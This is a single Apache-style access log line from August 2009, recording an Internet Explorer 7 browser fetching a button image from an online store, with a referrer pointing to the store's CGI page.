76.182.64.28 - - [05/Aug/2009:07:07:45 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0098861" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
